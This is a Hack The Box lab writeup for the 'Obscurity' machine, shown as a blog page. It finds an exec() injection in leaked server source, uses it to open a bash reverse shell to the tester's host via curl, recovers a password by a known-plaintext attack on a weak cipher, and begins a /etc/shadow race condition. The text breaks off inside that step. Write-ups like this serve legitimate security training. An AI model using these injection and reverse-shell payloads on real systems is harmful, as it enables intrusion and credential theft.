<!DOCTYPE html>
<html lang="en"><head>
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1"><!-- Begin Jekyll SEO tag v2.6.1 -->
<title>Hack The Box - Obscurity Writeup | Chr0x6eOs</title>
<meta name="generator" content="Jekyll v3.8.5" />
<meta property="og:title" content="Hack The Box - Obscurity Writeup" />
<meta name="author" content="Chr0x6eOs" />
<meta property="og:locale" content="en" />
<meta name="description" content="Overview" />
<meta property="og:description" content="Overview" />
<link rel="canonical" href="http://localhost:4000/2020/05/09/htb-Obscurity.html" />
<meta property="og:url" content="http://localhost:4000/2020/05/09/htb-Obscurity.html" />
<meta property="og:site_name" content="Chr0x6eOs" />
<meta property="og:image" content="http://localhost:4000/assets/htb/Obscurity/logo.png" />
<meta property="og:image:height" content="300" />
<meta property="og:image:width" content="300" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2020-05-09T00:00:00+02:00" />
<script type="application/ld+json">
{"image":{"width":300,"height":300,"url":"http://localhost:4000/assets/htb/Obscurity/logo.png","@type":"imageObject"},"@type":"BlogPosting","url":"http://localhost:4000/2020/05/09/htb-Obscurity.html","dateModified":"2020-05-09T00:00:00+02:00","mainEntityOfPage":{"@type":"WebPage","@id":"http://localhost:4000/2020/05/09/htb-Obscurity.html"},"author":{"@type":"Person","name":"Chr0x6eOs"},"headline":"Hack The Box - Obscurity Writeup","description":"Overview","datePublished":"2020-05-09T00:00:00+02:00","@context":"https://schema.org"}</script>
<!-- End Jekyll SEO tag -->
<link rel="stylesheet" href="/assets/main.css"><link type="application/atom+xml" rel="alternate" href="http://localhost:4000/feed.xml" title="Chr0x6eOs" /></head>
<body><header class="site-header" role="banner">

  <div class="wrapper"><a class="site-title" rel="author" href="/">Chr0x6eOs</a><nav class="site-nav">
        <input type="checkbox" id="nav-trigger" class="nav-trigger" />
        <label for="nav-trigger">
          <span class="menu-icon">
            <svg viewBox="0 0 18 15" width="18px" height="15px">
              <path d="M18,1.484c0,0.82-0.665,1.484-1.484,1.484H1.484C0.665,2.969,0,2.304,0,1.484l0,0C0,0.665,0.665,0,1.484,0 h15.032C17.335,0,18,0.665,18,1.484L18,1.484z M18,7.516C18,8.335,17.335,9,16.516,9H1.484C0.665,9,0,8.335,0,7.516l0,0 c0-0.82,0.665-1.484,1.484-1.484h15.032C17.335,6.031,18,6.696,18,7.516L18,7.516z M18,13.516C18,14.335,17.335,15,16.516,15H1.484 C0.665,15,0,14.335,0,13.516l0,0c0-0.82,0.665-1.483,1.484-1.483h15.032C17.335,12.031,18,12.695,18,13.516L18,13.516z"/>
            </svg>
          </span>
        </label>

        <div class="trigger"><a class="page-link" href="/about/">About</a></div>
      </nav></div>
</header>
<main class="page-content" aria-label="Content">
      <div class="wrapper">
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">

  <header class="post-header">
    <h1 class="post-title p-name" itemprop="name headline">Hack The Box - Obscurity Writeup</h1>
    <p class="post-meta">
      <time class="dt-published" datetime="2020-05-09T00:00:00+02:00" itemprop="datePublished">May 9, 2020
      </time>• <span itemprop="author" itemscope itemtype="http://schema.org/Person"><span class="p-author h-card" itemprop="name">Chr0x6eOs</span></span></p>
  </header>

  <div class="post-content e-content" itemprop="articleBody">
    <h1 id="overview">Overview</h1>
<p><img src="/assets/htb/Obscurity/obscurity.png" alt="Obscurity Image" /></p>

<p><a href="https://www.hackthebox.eu/home/machines/profile/219">Obscurity</a> is a medium linux box by <a href="https://www.hackthebox.eu/home/users/profile/83743">clubby789</a>.</p>

<p>The box starts with web-enumeration, where we have to fuzz for a secret diretory to leak the source code of the server. Analyzing the source code, we see that the exec function is called with user-input, which leads to code-execution and gives us a shell in the context of www-data. Enumerating the system, we find that the password of the user is saved in an encrypted form. The encryption script is vulnerable to known-plaintext attack, which we can exploit to get the encryption key. With the key, we can decrypt the password and login as user.
For root, we find a custom ssh script, that temporarly copies the shadow file to /tmp/. With this we have a race-condition to read the shadow and crack the root password.</p>

<h1 id="information-gathering">Information Gathering</h1>

<h2 id="nmap">Nmap</h2>
<p>We begin our enumeration by running Nmap to find open ports and enumerate services.</p>

<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">root@silence:~#</span><span class="w"> </span>nmap <span class="nt">-sC</span> <span class="nt">-sV</span> 10.10.10.168
<span class="go">nmap -sC -sV 10.10.10.168
Nmap scan report for 10.10.10.168
Host is up (0.050s latency).
Not shown: 996 filtered ports
PORT     STATE  SERVICE    VERSION
</span><span class="gp">22/tcp   open   ssh        OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux;</span><span class="w"> </span>protocol 2.0<span class="o">)</span>
<span class="go">| ssh-hostkey:
|   2048 33:d3:9a:0d:97:2c:54:20:e1:b0:17:34:f4:ca:70:1b (RSA)
|   256 f6:8b:d5:73:97:be:52:cb:12:ea:8b:02:7c:34:a3:d7 (ECDSA)
|_  256 e8:df:55:78:76:85:4b:7b:dc:70:6a:fc:40:cc:ac:9b (ED25519)
80/tcp   closed http
8080/tcp open   http-proxy BadHTTPServer
| fingerprint-strings:
|   GetRequest, HTTPOptions:
|     HTTP/1.1 200 OK
|     Date: Wed, 06 May 2020 17:07:03
|     Server: BadHTTPServer
|     Last-Modified: Wed, 06 May 2020 17:07:03
|     Content-Length: 4171
|     Content-Type: text/html
|     Connection: Closed
</span><span class="gp">|     &lt;!DOCTYPE html&gt;</span><span class="w">
</span><span class="gp">|     &lt;html lang="en"&gt;</span><span class="w">
</span><span class="gp">|     &lt;head&gt;</span><span class="w">
</span><span class="gp">|     &lt;meta charset="utf-8"&gt;</span><span class="w">
</span><span class="gp">|     &lt;title&gt;</span>0bscura&lt;/title&gt;
<span class="go">[...]
</span></code></pre></div></div>

<h1 id="enumeration">Enumeration</h1>
<p>The only two open ports shown are <strong>22</strong> and <strong>8080</strong>. SSH usually is not that interesting, so let’s begin with http.</p>

<h2 id="http---port-8080">HTTP - Port 8080</h2>
<p>Going to http://10.10.10.168:8080 a webpage is shown.</p>

<p><img src="/assets/htb/Obscurity/webpage-index.png" alt="Index webpage" /></p>

<p>Scrolling down on the website, we see an interesting note.</p>

<p><img src="/assets/htb/Obscurity/webpage-src-hint.png" alt="Source hint" /></p>

<p>The note states, that the server <code class="language-plaintext highlighter-rouge">SuperSecureServer.py</code> can be found in the secret development dir. Let us fuzz for this dir next.</p>

<h3 id="fuzzing-secret-directory">Fuzzing secret directory</h3>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">root@silence:~#</span><span class="w"> </span>ffuf <span class="nt">-u</span> http://10.10.10.168:8080/FUZZ/SuperSecureServer.py <span class="nt">-w</span> /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt <span class="nt">-c</span>
<span class="go">
        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v0.12
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.10.168:8080/FUZZ/SuperSecureServer.py
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403
________________________________________________

develop                 [Status: 200, Size: 5892, Words: 1806, Lines: 171]
:: Progress: [5059/220547] :: 389 req/sec :: Duration: [0:00:13] :: Errors: 1 ::
[WARN] Caught keyboard interrupt (Ctrl-C)
</span></code></pre></div></div>
<p>After a couple of seconds, we find the secret directory under /develop.</p>

<p>Let us check out the source code at http://10.10.10.168:8080/develop/SuperSecureServer.py.</p>

<p><img src="/assets/htb/Obscurity/webpage-src-leak.png" alt="Source code" /></p>

<p>Let us download the server using wget:</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">root@silence:~#</span><span class="w"> </span>wget http://10.10.10.168:8080/develop/SuperSecureServer.py
<span class="go">--2020-05-06 19:22:32--  http://10.10.10.168:8080/develop/SuperSecureServer.py
Connecting to 10.10.10.168:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5892 (5.8K) [text/plain]
Saving to: ‘SuperSecureServer.py’

</span><span class="gp">SuperSecureServer.py          100%[===============================================&gt;</span><span class="o">]</span>   5.75K  <span class="nt">--</span>.-KB/s    <span class="k">in </span>0.001s
<span class="go">
2020-05-06 19:22:32 (7.46 MB/s) - ‘SuperSecureServer.py’ saved [5892/5892]
</span></code></pre></div></div>

<h3 id="analyzing-the-source-code">Analyzing the source code</h3>
<p>Looking through the source, we can find an exec with user-supplied input.</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">def</span> <span class="nf">serveDoc</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">path</span><span class="p">,</span> <span class="n">docRoot</span><span class="p">):</span>
        <span class="n">path</span> <span class="o">=</span> <span class="n">urllib</span><span class="o">.</span><span class="n">parse</span><span class="o">.</span><span class="n">unquote</span><span class="p">(</span><span class="n">path</span><span class="p">)</span>
        <span class="k">try</span><span class="p">:</span>
            <span class="n">info</span> <span class="o">=</span> <span class="s">"output = 'Document: {}'"</span> <span class="c1"># Keep the output for later debug
</span>            <span class="k">exec</span><span class="p">(</span><span class="n">info</span><span class="o">.</span><span class="nb">format</span><span class="p">(</span><span class="n">path</span><span class="p">))</span> <span class="c1"># This is how you do string formatting, right?
</span>            <span class="n">cwd</span> <span class="o">=</span> <span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">dirname</span><span class="p">(</span><span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">realpath</span><span class="p">(</span><span class="n">__file__</span><span class="p">))</span>
            <span class="n">docRoot</span> <span class="o">=</span> <span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">cwd</span><span class="p">,</span> <span class="n">docRoot</span><span class="p">)</span>
            <span class="k">if</span> <span class="n">path</span> <span class="o">==</span> <span class="s">"/"</span><span class="p">:</span>
                <span class="n">path</span> <span class="o">=</span> <span class="s">"/index.html"</span>
	<span class="p">[</span><span class="o">...</span><span class="p">]</span>
</code></pre></div></div>
<p>Exec with user-input in most cases leads to code-execution!</p>

<p>Let us test our assumptions locally:</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">root@silence:~#</span><span class="w"> </span>python3
<span class="go">Python 3.8.2 (default, Apr  1 2020, 15:52:55)
[GCC 9.3.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
</span><span class="gp">&gt;</span><span class="o">&gt;&gt;</span> info <span class="o">=</span> <span class="s2">"output = 'Document: {}'"</span>
<span class="gp">&gt;</span><span class="o">&gt;&gt;</span> path <span class="o">=</span> <span class="s2">"'"</span>
<span class="gp">&gt;</span><span class="o">&gt;&gt;</span> <span class="nb">exec</span><span class="o">(</span>info.format<span class="o">(</span>path<span class="o">))</span>
<span class="go">Traceback (most recent call last):
</span><span class="gp">  File "&lt;stdin&gt;</span><span class="s2">", line 1, in &lt;module&gt;
</span><span class="gp">  File "&lt;string&gt;</span><span class="s2">"</span>, line 1
<span class="go">    output = 'Document: ''
                         ^
SyntaxError: EOL while scanning string literal
</span></code></pre></div></div>
<p>When we supply a ‘, we break the python code and get a SyntaxError. Let us try to inject python code next.</p>

<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">root@silence:~#</span><span class="w"> </span>python3
<span class="go">Python 3.8.2 (default, Apr  1 2020, 15:52:55)
[GCC 9.3.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
</span><span class="gp">&gt;</span><span class="o">&gt;&gt;</span> info <span class="o">=</span> <span class="s2">"output = 'Document: {}'"</span>
<span class="gp">&gt;</span><span class="o">&gt;&gt;</span> path <span class="o">=</span><span class="s2">" '; print('test'); x='"</span>
<span class="gp">&gt;</span><span class="o">&gt;&gt;</span> <span class="nb">exec</span><span class="o">(</span>info.format<span class="o">(</span>path<span class="o">))</span>
<span class="go">test
</span></code></pre></div></div>
<p>By injecting the single-quote, we terminate the format string. We can now add arbitrary python-code and then terminate the other quote by creating a variable x=’. Let us test the python-code-execution on the server next.</p>

<h1 id="abusing-code-injection-to-get-a-shell">Abusing code-injection to get a shell</h1>
<p>We can test code-execution on the server with a simple ping-back payload:
<code class="language-plaintext highlighter-rouge">';__import__('os').popen('ping -c 2 127.0.0.1').read();a='</code></p>

<p>After url-encoding some of the characters, we can send following request:</p>
<div class="language-http highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nf">GET</span> <span class="nn">/';__import__('os').popen('ping%20-c%202%2010.10.14.2').read();a='</span> <span class="k">HTTP</span><span class="o">/</span><span class="m">1.1</span>
<span class="na">Host</span><span class="p">:</span> <span class="s">10.10.10.168:8080</span>
</code></pre></div></div>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">root@silence:~#</span><span class="w"> </span>tcpdump <span class="nt">-i</span> tun0 icmp
<span class="go">tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on tun0, link-type RAW (Raw IP), capture size 262144 bytes
</span><span class="gp">19:39:02.217462 IP 10.10.10.168 &gt;</span><span class="w"> </span>silence: ICMP <span class="nb">echo </span>request, <span class="nb">id </span>32182, <span class="nb">seq </span>1, length 64
<span class="gp">19:39:02.217488 IP silence &gt;</span><span class="w"> </span>10.10.10.168: ICMP <span class="nb">echo </span>reply, <span class="nb">id </span>32182, <span class="nb">seq </span>1, length 64
<span class="gp">19:39:03.227853 IP 10.10.10.168 &gt;</span><span class="w"> </span>silence: ICMP <span class="nb">echo </span>request, <span class="nb">id </span>32182, <span class="nb">seq </span>2, length 64
<span class="gp">19:39:03.227870 IP silence &gt;</span><span class="w"> </span>10.10.10.168: ICMP <span class="nb">echo </span>reply, <span class="nb">id </span>32182, <span class="nb">seq </span>2, length 64
</code></pre></div></div>
<p>We have verified remote code execution with the ping response from the server. Let us get a shell next.</p>

<p>A simple bash reverse-shell should do the trick.</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="s">';__import__('</span><span class="n">os</span><span class="s">').popen('</span><span class="n">bash</span> <span class="o">-</span><span class="n">c</span> <span class="s">"bash -i &gt;&amp; /dev/tcp/10.10.14.2/443 0&gt;&amp;1"').read();a='</span>
</code></pre></div></div>

<p>Using curl, we get a shell:</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">root@silence:~#</span><span class="w"> </span>curl <span class="s1">$'http://10.10.10.168:8080/</span><span class="se">\'</span><span class="s1">;__import__(</span><span class="se">\'</span><span class="s1">os</span><span class="se">\'</span><span class="s1">).popen(</span><span class="se">\'</span><span class="s1">bash%20-c%20%22bash%20-i%20%3E&amp;%20/dev/tcp/10.10.14.2/443%200%3E&amp;1%22</span><span class="se">\'</span><span class="s1">).read();a=</span><span class="se">\'</span><span class="s1">'</span><span class="sb">`</span>
</code></pre></div></div>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">root@silence:~#</span><span class="w"> </span>nc <span class="nt">-lvnp</span> 443
<span class="go">Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 10.10.10.168.
Ncat: Connection from 10.10.10.168:46672.
</span><span class="gp">www-data@obscure:/$</span><span class="w">
</span></code></pre></div></div>
<p>We get a shell as www-data returned. Let us quickly upgrade our shell to make working easier.</p>

<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">www-data@obscure:/$</span><span class="w"> </span>python3 <span class="nt">-c</span> <span class="s1">'import pty;pty.spawn("/bin/bash")'</span>
<span class="gp">python3 -c 'import pty;</span>pty.spawn<span class="o">(</span><span class="s2">"/bin/bash"</span><span class="o">)</span><span class="s1">'
</span><span class="gp">www-data@obscure:/$</span><span class="w"> </span><span class="s1">^Z
</span><span class="go">[1]+  Stopped                 nc -lvnp 443
</span><span class="gp">root@silence:~/ctf/htb/boxes/Obscurity#</span><span class="w"> </span><span class="nb">stty </span>raw <span class="nt">-echo</span>
<span class="gp">root@silence:~/ctf/htb/boxes/Obscurity#</span><span class="w"> </span>nc <span class="nt">-lvnp</span> 443
<span class="go">
</span><span class="gp">www-data@obscure:/$</span><span class="w">
</span></code></pre></div></div>
<p>Now with a fully working shell, we can enumerate the system and search for a privesc path.</p>

<h2 id="privesc-to-user">Privesc to user</h2>
<p>Checking out /etc/passwd we see that we only have one user we can privesc to <code class="language-plaintext highlighter-rouge">robert:x:1000:1000:robert:/home/robert:/bin/bash</code>.</p>

<h3 id="enumeration-as-www-data">Enumeration as www-data</h3>
<p>Checking out the home folder of robert (/home/robert):</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">www-data@obscure:/home/robert$</span><span class="w"> </span><span class="nb">ls</span> <span class="nt">-alh</span>
<span class="go">total 60K
-rw-rw-r-- 1 robert robert   94 Sep 26  2019 check.txt
-rw-rw-r-- 1 robert robert  185 Oct  4  2019 out.txt
-rw-rw-r-- 1 robert robert   27 Oct  4  2019 passwordreminder.txt
-rwxrwxr-x 1 robert robert 2.5K Oct  4  2019 SuperSecureCrypt.py
-rwx------ 1 robert robert   33 Sep 25  2019 user.txt
</span></code></pre></div></div>
<p>These files seem interesting, let us look at the SuperSecureCrypt.py file.</p>

<h4 id="known-plaintext-attack">Known plaintext attack</h4>
<p>Looking at the contents of the files in the directory, it seems like we have a plaintext and a ciphertext, generated by the SuperSecureCrypt.py script. Furthermore, we have a passwordreminder, which also seems to be encrypted by the SuperSecureCrypt.py script.</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">root@silence:~#</span><span class="w"> </span><span class="nb">cat </span>check.txt
<span class="go">Encrypting this file with your key should result in out.txt, make sure your key is correct!
</span><span class="gp">root@silence:~#</span><span class="w"> </span><span class="nb">cat </span>out.txt
<span class="go">¦ÚÈêÚÞØÛÝÝ	×ÐÊß
ÞÊÚÉæßÝËÚÛÚêÙÉëéÑÒÝÍÐ
êÆáÙÞãÒÑÐáÙ¦ÕæØãÊÎÍßÚêÆÝáäè	ÎÍÚÎëÑÓäáÛÌ×	v
</span></code></pre></div></div>

<p>Looking at the encryption and decryption function of the script, we can see that this seems to be a XOR like cipher.</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">def</span> <span class="nf">encrypt</span><span class="p">(</span><span class="n">text</span><span class="p">,</span> <span class="n">key</span><span class="p">):</span>
    <span class="n">keylen</span> <span class="o">=</span> <span class="nb">len</span><span class="p">(</span><span class="n">key</span><span class="p">)</span>
    <span class="n">keyPos</span> <span class="o">=</span> <span class="mi">0</span>
    <span class="n">encrypted</span> <span class="o">=</span> <span class="s">""</span>
    <span class="k">for</span> <span class="n">x</span> <span class="ow">in</span> <span class="n">text</span><span class="p">:</span>
        <span class="n">keyChr</span> <span class="o">=</span> <span class="n">key</span><span class="p">[</span><span class="n">keyPos</span><span class="p">]</span>
        <span class="n">newChr</span> <span class="o">=</span> <span class="nb">ord</span><span class="p">(</span><span class="n">x</span><span class="p">)</span>
        <span class="n">newChr</span> <span class="o">=</span> <span class="nb">chr</span><span class="p">((</span><span class="n">newChr</span> <span class="o">+</span> <span class="nb">ord</span><span class="p">(</span><span class="n">keyChr</span><span class="p">))</span> <span class="o">%</span> <span class="mi">255</span><span class="p">)</span>
        <span class="n">encrypted</span> <span class="o">+=</span> <span class="n">newChr</span>
        <span class="n">keyPos</span> <span class="o">+=</span> <span class="mi">1</span>
        <span class="n">keyPos</span> <span class="o">=</span> <span class="n">keyPos</span> <span class="o">%</span> <span class="n">keylen</span>
    <span class="k">return</span> <span class="n">encrypted</span>

<span class="k">def</span> <span class="nf">decrypt</span><span class="p">(</span><span class="n">text</span><span class="p">,</span> <span class="n">key</span><span class="p">):</span>
    <span class="n">keylen</span> <span class="o">=</span> <span class="nb">len</span><span class="p">(</span><span class="n">key</span><span class="p">)</span>
    <span class="n">keyPos</span> <span class="o">=</span> <span class="mi">0</span>
    <span class="n">decrypted</span> <span class="o">=</span> <span class="s">""</span>
    <span class="k">for</span> <span class="n">x</span> <span class="ow">in</span> <span class="n">text</span><span class="p">:</span>
        <span class="n">keyChr</span> <span class="o">=</span> <span class="n">key</span><span class="p">[</span><span class="n">keyPos</span><span class="p">]</span>
        <span class="n">newChr</span> <span class="o">=</span> <span class="nb">ord</span><span class="p">(</span><span class="n">x</span><span class="p">)</span>
        <span class="n">newChr</span> <span class="o">=</span> <span class="nb">chr</span><span class="p">((</span><span class="n">newChr</span> <span class="o">-</span> <span class="nb">ord</span><span class="p">(</span><span class="n">keyChr</span><span class="p">))</span> <span class="o">%</span> <span class="mi">255</span><span class="p">)</span>
        <span class="n">decrypted</span> <span class="o">+=</span> <span class="n">newChr</span>
        <span class="n">keyPos</span> <span class="o">+=</span> <span class="mi">1</span>
        <span class="n">keyPos</span> <span class="o">=</span> <span class="n">keyPos</span> <span class="o">%</span> <span class="n">keylen</span>
    <span class="k">return</span> <span class="n">decrypted</span>
</code></pre></div></div>
<p>The situation (similar to XOR) looks like the following: (Where X is some en/decryption-operation)</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Cipher = Plain X Key
Plain = Cipher X Key
</code></pre></div></div>
<p>We know both ciphertext and plaintext, which means if we look at this cipher like a math-equation, we have two known value and can solve by the third.
<code class="language-plaintext highlighter-rouge">Key =  Plain X Cipher</code></p>

<p>Applying this knowledge to the actual script we can use a known-plaintext attack to get the key.</p>

<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">root@silence:~#</span><span class="w"> </span>python3 SuperSecureCrypt.py <span class="nt">-h</span>
<span class="go">usage: SuperSecureCrypt.py [-h] [-i InFile] [-o OutFile] [-k Key] [-d]

Encrypt with 0bscura's encryption algorithm

optional arguments:
  -h, --help  show this help message and exit
  -i InFile   The file to read
  -o OutFile  Where to output the encrypted/decrypted file
  -k Key      Key to use
  -d          Decrypt mode
</span></code></pre></div></div>
<p>Ok so let us run the script with the ciphertext as the InFile and the contents of plaintext as the key.</p>

<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">root@silence:~#</span><span class="w"> </span>python3 SuperSecureCrypt.py <span class="nt">-i</span> out.txt <span class="nt">-k</span> <span class="s2">"</span><span class="si">$(</span><span class="nb">cat </span>check.txt<span class="si">)</span><span class="s2">"</span> <span class="nt">-d</span> <span class="nt">-o</span> key.txt
<span class="gp">#</span><span class="c">###############################</span>
<span class="gp">#</span><span class="w">           </span>BEGINNING          <span class="c">#</span>
<span class="gp">#</span><span class="w">    </span>SUPER SECURE ENCRYPTOR    <span class="c">#</span>
<span class="gp">#</span><span class="c">###############################</span>
<span class="gp">  #</span><span class="c">###########################</span>
<span class="gp">  #</span><span class="w">        </span>FILE MODE         <span class="c">#</span>
<span class="gp">  #</span><span class="c">###########################</span>
<span class="go">Opening file out.txt...
Decrypting...
Writing to key.txt...
</span><span class="gp">root@silence:~#</span><span class="w"> </span><span class="nb">cat </span>key.txt
<span class="go">alexandrovichalexandrovichalexandrovichalexandrovichalexandrovichalexandrovichalexandrovichai
</span></code></pre></div></div>
<p>We have the key now! Let us decrypt the passwordreminder.txt with this key.</p>

<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">root@silence:~#</span><span class="w"> </span>python3 SuperSecureCrypt.py <span class="nt">-i</span> passwordreminder.txt <span class="nt">-k</span> <span class="s2">"</span><span class="si">$(</span><span class="nb">cat </span>key.txt<span class="si">)</span><span class="s2">"</span> <span class="nt">-d</span> <span class="nt">-o</span> passwd.txt
<span class="gp">#</span><span class="c">###############################</span>
<span class="gp">#</span><span class="w">           </span>BEGINNING          <span class="c">#</span>
<span class="gp">#</span><span class="w">    </span>SUPER SECURE ENCRYPTOR    <span class="c">#</span>
<span class="gp">#</span><span class="c">###############################</span>
<span class="gp">  #</span><span class="c">###########################</span>
<span class="gp">  #</span><span class="w">        </span>FILE MODE         <span class="c">#</span>
<span class="gp">  #</span><span class="c">###########################</span>
<span class="go">Opening file passwordreminder.txt...
Decrypting...
Writing to passwd.txt...
</span><span class="gp">root@silence:~#</span><span class="w"> </span><span class="nb">cat </span>passwd.txt
<span class="go">SecThruObsFTW
</span></code></pre></div></div>
<p>We have successfully decrypted the passwordreminder and can now su to robert and read user.txt.</p>

<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">www-data@obscure:/home/robert$</span><span class="w"> </span>su robert
<span class="go">Password: SecThruObsFTW
</span><span class="gp">robert@obscure:~$</span><span class="w"> </span><span class="nb">cat </span>user.txt
<span class="go">e4493***************************
</span></code></pre></div></div>

<h2 id="privesc-to-root">Privesc to root</h2>
<p>Now that we have user, let us enumerate our newly gained privileges and search for a path to get root on this system.</p>
<h3 id="enumeration-as-robert">Enumeration as robert</h3>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">robert@obscure:~$</span><span class="w"> </span><span class="nb">sudo</span> <span class="nt">-l</span>
<span class="go">Matching Defaults entries for robert on obscure:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User robert may run the following commands on obscure:
    (ALL) NOPASSWD: /usr/bin/python3 /home/robert/BetterSSH/BetterSSH.py
</span></code></pre></div></div>
<p>Checking our sudo privileges we seem to be allowed to run BetterSSH.py.</p>

<p>Let us read the source and check if we find any vulnerabilites in it.</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">[</span><span class="o">...</span><span class="p">]</span>
<span class="n">path</span> <span class="o">=</span> <span class="s">''</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">random</span><span class="o">.</span><span class="n">choices</span><span class="p">(</span><span class="n">string</span><span class="o">.</span><span class="n">ascii_letters</span> <span class="o">+</span> <span class="n">string</span><span class="o">.</span><span class="n">digits</span><span class="p">,</span> <span class="n">k</span><span class="o">=</span><span class="mi">8</span><span class="p">))</span>
<span class="p">[</span><span class="o">...</span><span class="p">]</span>
<span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="s">'/etc/shadow'</span><span class="p">,</span> <span class="s">'r'</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span>
        <span class="n">data</span> <span class="o">=</span> <span class="n">f</span><span class="o">.</span><span class="n">readlines</span><span class="p">()</span>
    <span class="n">data</span> <span class="o">=</span> <span class="p">[(</span><span class="n">p</span><span class="o">.</span><span class="n">split</span><span class="p">(</span><span class="s">":"</span><span class="p">)</span> <span class="k">if</span> <span class="s">"$"</span> <span class="ow">in</span> <span class="n">p</span> <span class="k">else</span> <span class="bp">None</span><span class="p">)</span> <span class="k">for</span> <span class="n">p</span> <span class="ow">in</span> <span class="n">data</span><span class="p">]</span>
    <span class="n">passwords</span> <span class="o">=</span> <span class="p">[]</span>
    <span class="k">for</span> <span class="n">x</span> <span class="ow">in</span> <span class="n">data</span><span class="p">:</span>
        <span class="k">if</span> <span class="ow">not</span> <span class="n">x</span> <span class="o">==</span> <span class="bp">None</span><span class="p">:</span>
            <span class="n">passwords</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="n">x</span><span class="p">)</span>

    <span class="n">passwordFile</span> <span class="o">=</span> <span class="s">'</span><span class="se">\n</span><span class="s">'</span><span class="o">.</span><span class="n">join</span><span class="p">([</span><span class="s">'</span><span class="se">\n</span><span class="s">'</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">p</span><span class="p">)</span> <span class="k">for</span> <span class="n">p</span> <span class="ow">in</span> <span class="n">passwords</span><span class="p">])</span>
    <span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="s">'/tmp/SSH/'</span><span class="o">+</span><span class="n">path</span><span class="p">,</span> <span class="s">'w'</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span>
        <span class="n">f</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="n">passwordFile</span><span class="p">)</span>
    <span class="n">time</span><span class="o">.</span><span class="n">sleep</span><span class="p">(</span><span class="mf">.1</span><span class="p">)</span>
    <span class="n">salt</span> <span class="o">=</span> <span class="s">""</span>
    <span class="n">realPass</span> <span class="o">=</span> <span class="s">""</span>
    <span class="k">for</span> <span class="n">p</span> <span class="ow">in</span> <span class="n">passwords</span><span class="p">:</span>
        <span class="k">if</span> <span class="n">p</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">==</span> <span class="n">session</span><span class="p">[</span><span class="s">'user'</span><span class="p">]:</span>
            <span class="n">salt</span><span class="p">,</span> <span class="n">realPass</span> <span class="o">=</span> <span class="n">p</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span><span class="o">.</span><span class="n">split</span><span class="p">(</span><span class="s">'$'</span><span class="p">)[</span><span class="mi">2</span><span class="p">:]</span>
            <span class="k">break</span>

    <span class="k">if</span> <span class="n">salt</span> <span class="o">==</span> <span class="s">""</span><span class="p">:</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"Invalid user"</span><span class="p">)</span>
        <span class="n">os</span><span class="o">.</span><span class="n">remove</span><span class="p">(</span><span class="s">'/tmp/SSH/'</span><span class="o">+</span><span class="n">path</span><span class="p">)</span>
